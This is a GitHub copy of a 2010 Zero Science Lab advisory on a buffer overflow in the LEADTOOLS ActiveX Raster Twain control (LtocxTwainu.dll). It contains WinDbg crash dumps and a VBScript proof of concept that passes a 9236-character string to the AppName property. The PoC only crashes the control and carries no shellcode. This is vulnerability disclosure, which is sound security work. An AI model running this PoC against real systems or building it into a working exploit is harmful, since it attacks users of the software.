forked from liquidworm/advisory
-
Notifications
You must be signed in to change notification settings - Fork 0
/
ZSL-2010-4960
161 lines (112 loc) · 4.33 KB
/
ZSL-2010-4960
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC
Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2
Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.
Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundry of the user input.
Tested On: Microsoft Windows XP Professional SP3 (EN)
Windows Internet Explorer 8.0.6001.18702
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)
===============================================================
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901 mov word ptr [ecx],ax ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff cmp byte ptr [ebx+7],0FFh ds:0023:00410040=??
==================================================================
Registers:
--------------------------------------------------
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC
--
EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000
ArgDump:
--------------------------------------------------
EBP+8 016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 00000000
EBP+20 0013EF6C -> BAAD0008
EBP+24 100255BC -> 10014840 -> Asc: @H@H
EBP+28 0013EDB8 -> 00000000
--
EBP+8 00150000 -> 000000C8
EBP+12 00410039
EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20 00000000
EBP+24 00410041
EBP+28 7C80FF12 -> 9868146A
CompanyName LEAD Technologies, Inc.
FileDescription LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion 16,5,0,2
InternalName LTRTNU
LegalCopyright © 1991-2009 LEAD Technologies, Inc.
OriginalFileName LTRTNU.DLL
ProductName LEADTOOLS® for Win32
ProductVersion 16.5.0.0
Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
Exception Code: ACCESS_VIOLATION
Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll)
Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll)
Exception Code: BREAKPOINT
Disasm: 7C90120E INT3 (ntdll.dll)
Seh Chain:
--------------------------------------------------
1 7C839AC0 KERNEL32.dll
2 FC2950 VBSCRIPT.dll
3 7C90E900 ntdll.dll
7C912F4E MOV [ECX],AX <--- CRASH
7C96C540 CMP BYTE PTR [EBX+7],FF <--- CRASH
7C90120F RETN <--- CRASH
==================================================================
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
24.08.2010
Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php
PoC:
<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"
prototype = "Property Let AppName As String"
memberName = "AppName"
progid = "LTRASTERTWAINLib_U.LEADRasterTwain_U"
argCount = 1
arg1=String(9236, "A")
target.AppName = arg1
</script>